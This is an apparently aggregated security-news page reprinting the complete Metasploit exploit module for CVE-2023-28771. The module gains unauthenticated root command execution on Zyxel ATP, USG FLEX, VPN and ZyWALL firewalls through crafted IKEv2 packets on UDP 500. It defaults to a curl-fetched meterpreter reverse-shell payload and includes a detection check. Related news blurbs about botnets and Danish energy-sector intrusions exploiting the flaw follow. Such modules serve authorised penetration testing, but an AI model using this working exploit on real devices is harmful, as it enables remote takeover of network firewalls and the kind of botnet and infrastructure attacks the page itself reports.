Security
Headlines
HeadlinesLatestCVEs

Headline

Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution

This Metasploit module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive), VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The affected devices are vulnerable in a default configuration and command execution is with root privileges.

Packet Storm
#vulnerability#linux#git#rce#auth#ssh
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = GreatRanking  include Msf::Exploit::Remote::Udp  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange          (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are          as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive),          VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The          affected devices are vulnerable in a default configuration and command execution is with root privileges.        },        'License' => MSF_LICENSE,        'Author' => [          'sf', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2023-28771'],          ['URL', 'https://attackerkb.com/topics/N3i8dxpFKS/cve-2023-28771/rapid7-analysis'],          ['URL', 'https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls']        ],        'DisclosureDate' => '2023-03-31',        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD],        'Privileged' => true, # Code execution as 'root'        'DefaultOptions' => {          # We default to a meterpreter payload delivered via a fetch HTTP adapter.          # Another good payload choice is cmd/unix/reverse_bash.          'PAYLOAD' => 'cmd/linux/http/mips64/meterpreter_reverse_tcp',          'FETCH_WRITABLE_DIR' => '/tmp',          'FETCH_COMMAND' => 'CURL'        },        'Targets' => [ [ 'Default', {} ] ],        'DefaultTarget' => 0,        'Notes' => {          # The process /sbin/sshipsecpm may crash after we terminate a session, but it will restart.          'Stability' => [CRASH_SERVICE_RESTARTS],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(500)      ]    )  end  def check    connect_udp    # Check for the Internet Key Exchange (IKE) service by sending an IKEv1 header with no payload. We can    # expect to receive an IKE reply containing a Notification payload with a PAYLOAD-MALFORMED message.    # In a default configuration, there appears no known method to identify the platform vendor or version    # number, so we cannot identify a CheckCode other than CheckCode::Detected or CheckCode::Unknown.    # If a VPN is configured on the target device, we may receive a Vendor ID corresponding to Zyxel, but we    # still would not be able to identify the version number of the target service.    ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI    ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI    ikev2_header << [0].pack('C') # Next Payload: None - 0    ikev2_header << [16].pack('C') # Version: 1.0 - 16 (0x10)    ikev2_header << [2].pack('C') # Exchange Type: Identity Protection - 2    ikev2_header << [0].pack('C') # Flags: None - 0    ikev2_header << [0].pack('N') # ID: 0    ikev2_header << [ikev2_header.length + 4].pack('N') # Length    udp_sock.put(ikev2_header)    ikev2_reply = udp_sock.get(udp_sock.def_read_timeout)    disconnect_udp    if !ikev2_reply.empty? && (ikev2_reply.length >= 40) &&       # Ensure the response 'Initiator SPI' field is the same as the original one sent.       (ikev2_reply[0, 8] == ikev2_header[0, 8]) &&       # Ensure the 'Next Payload' field is Notification (11)       (ikev2_reply[16, 1].unpack('C').first == 11 &&         # Ensure the 'Exchange Type' field is Informational (5)         (ikev2_reply[18, 1].unpack('C').first == 5)) &&       # Ensure the 'Notify Message Type' field is PAYLOAD-MALFORMED (16)       (ikev2_reply[38, 2].unpack('n').first == 16)      return CheckCode::Detected('IKE detected but device vendor and service version are unknown.')    end    CheckCode::Unknown  end  def exploit    execute_command(payload.encoded)  end  def execute_command(cmd)    connect_udp    cmd_injection = "\";bash -c \"#{cmd}\";echo -n \""    # This value is decoded by the packet decoder using a DES-CBC algorithm. The decoded value is written to the    # log file. As such the decoded value must not have any null terminator values as these will break our command    # payload. Therefore we use the below known good value that will decode to a suitable string, allowing the cmd    # injection payload to work as expected.    haxb48 = 'HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB'    ikev2_payload = [0].pack('C') # Next Payload: None - 0    ikev2_payload << [0].pack('C') # Reserved: 0    ikev2_payload << [8 + (haxb48.length + cmd_injection.length)].pack('n') # Length: 8 byte header + Notification Data    ikev2_payload << [1].pack('C') # Protocol ID: ISAKMP - 1    ikev2_payload << [0].pack('C') # SPI Size: None - 0    ikev2_payload << [14].pack('n') # Type: NO_PROPOSAL_CHOSEN - 14 (0x0E)    ikev2_payload << haxb48 + cmd_injection # Notification Data    ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI    ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI    ikev2_header << [41].pack('C') # Next Payload: Notify - 41 (0x29)    ikev2_header << [32].pack('C') # Version: 2.0 - 32 (0x20)    ikev2_header << [34].pack('C') # Exchange Type: IKE_SA_INIT - 34 (0x22)    ikev2_header << [8].pack('C') # Flags: Initiator - 8    ikev2_header << [0].pack('N') # ID: 0    ikev2_header << [ikev2_header.length + 4 + ikev2_payload.length].pack('N') # Length    packet = ikev2_header << ikev2_payload    udp_sock.put(packet)    disconnect_udp  endend

Related news

New Findings Challenge Attribution in Denmark's Energy Sector Cyberattacks

The cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings from Forescout show. The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a

CVE-2023-5593: Security Advisories | Zyxel Networks

The out-of-bounds write vulnerability in the Windows-based SecuExtender SSL VPN Client software version 4.0.4.0 could allow an authenticated local user to gain a privilege escalation by sending a crafted CREATE message.

Russian Hackers Launch 'Largest Ever Cyber Attack' on Danish Critical Infrastructure

Russian threat actors have been possibly linked to what's been described as the "largest cyber attack against Danish critical infrastructure," in which 22 companies associated with the operation of the country's energy sector were targeted in May 2023.  "22 simultaneous, successful cyberattacks against Danish critical infrastructure are not commonplace," Denmark's SektorCERT said [PDF]. "The

DDoS Botnets Hijacking Zyxel Devices to Launch Devastating Attacks

Several distributed denial-of-service (DDoS) botnets have been observed exploiting a critical flaw in Zyxel devices that came to light in April 2023 to gain remote control of vulnerable systems. "Through the capture of exploit traffic, the attacker's IP address was identified, and it was determined that the attacks were occurring in multiple regions, including Central America, North America,

Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks

By Waqas The DDoS attacks have been observed in various regions, including Central America, North America, East Asia, and South Asia. This is a post from HackRead.com Read the original post: Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks

Zyxel Firewalls Under Attack! Urgent Patching Required

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday placed two recently disclosed flaws in Zyxel firewalls to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities, tracked as CVE-2023-33009 and CVE-2023-33010, are buffer overflow vulnerabilities that could enable an unauthenticated attacker to cause a

Active Mirai Botnet Variant Exploiting Zyxel Devices for DDoS Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched critical security flaw in Zyxel gear to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command injection flaw impacting different firewall models that could enable an unauthenticated attacker

Mirai Malware Hits Zyxel Devices After Command Injection Bug

By Deeba Ahmed A variant of the Mirai botnet is targeting Zyxel Firewalls after exploiting a newly patched operating system command injection vulnerability. This is a post from HackRead.com Read the original post: Mirai Malware Hits Zyxel Devices After Command Injection Bug

Zyxel Issues Critical Security Patches for Firewall and VPN Products

Zyxel has released software updates to address two critical security flaws affecting select firewall and VPN products that could be abused by remote attackers to achieve code execution. Both the flaws – CVE-2023-33009 and CVE-2023-33010 – are buffer overflow vulnerabilities and are rated 9.8 out of 10 on the CVSS scoring system. A brief description of the two issues is below - CVE-2023-33009 -

Zyxel Firewall Devices Vulnerable to Remote Code Execution Attacks — Patch Now

Networking equipment maker Zyxel has released patches for a critical security flaw in its firewall devices that could be exploited to achieve remote code execution on affected systems. The issue, tracked as CVE-2023-28771, is rated 9.8 on the CVSS scoring system. Researchers from TRAPA Security have been credited with reporting the flaw. "Improper error message handling in some firewall versions

CVE-2023-28771: Zyxel security advisory for OS command injection vulnerability of firewalls | Zyxel Networks

Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution